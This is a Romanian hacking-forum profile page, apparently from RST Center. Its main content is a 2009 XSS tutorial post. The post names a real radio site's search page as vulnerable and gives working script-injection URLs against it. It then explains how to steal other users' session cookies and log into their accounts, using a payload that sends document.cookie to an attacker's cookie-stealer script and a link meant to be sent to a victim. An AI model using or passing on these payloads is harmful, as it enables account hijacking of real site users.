Jump to content

Snikk

Members
  • Posts

    7
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Snikk's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. Mno am postat tutorialul meu Te deranjeaza pe tine?
  2. ================================ Nik: Snikk Date: 14.02.2009 Site: http://rstcenter.com/ ================================ De obicei, vulnerabilitatea XSS este legata de cookieuri si message boxuri. Sa presupunem ca am gasit un site vulnerabil la XSS. Fie acesta: http://www.radio3net.ro/ Scriptul il scriem in search: <script>alert(/HellSoft/)</script> Acest script adaugat la URL: <script>alert(/HellSoft/)</script> nu face nimic mai mult decat a insera un message box in pui tu un text care vrei. Spre exemplu modific <script>alert(/HellSoft/)</script> cu <script>alert(/HellGate/)</script> .Tot aceiasi erroare v-a da... URL va arata in felul urmator: http://www.radio3net.ro/search.php?str=%3Cscript%3Ealert(%2FHellGate%2F)%3C%2Fscript%3E&cx=best500albums Decoamdata vulnerabilitatea nu face nimic, dar o putem exploata si mai mult. In loc de mesajul (HellSoft) dintre cele 2 paranteze ale alertului (ale scriptului) putem introduce: document.cookie si javascriptul care trebuie bagat la URL va arata in felul urmator: <script>alert(document.cookie)</script> . Si in cazul XSS-ului nostru: http://www.radio3net.ro/search.php?str=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&cx=best500albums Acest script genereaza un Message Box in care se afla cookieurile tale. Acum sa vedem cum sa facem rost si de cookieurile altor useri, ca apoi sa ma loghez pe conturile lor folosind acest cookie. Sa consideram urmatorul cod: <SCRIPT>location.href=”http://www.radio3net.ro/search.php?str=''+escape(document.cookie)</SCRIPT> Acest cod il introducem la url si il trimitem apoi (url’ul) la victima. Daca aceasta da click pe link, atunci cookieurile sale vor ramane la tine pe FTP sau ti se vor trimite pe mail, depinde cum este conceput stealerul. Exemplu de link: www.sitevulnerabil.com/pagvuln.php?ceva=<SCRIPT>location.href=”http://www.siteultau.com/cookiestealer.php?c=”+escape(document.cookie)</SCRIPT>
  3. Imi place ideea ta Nytro.
  4. Snikk

    Snikk

    Nick: Snikk Varsta: 18 ani Email:snikk@yahoo.com Cunostinte: Visual Basic, XSS si ceva SQL Injection (Mai am de invatat de aceea am venit pe RST )
×
×
  • Create New...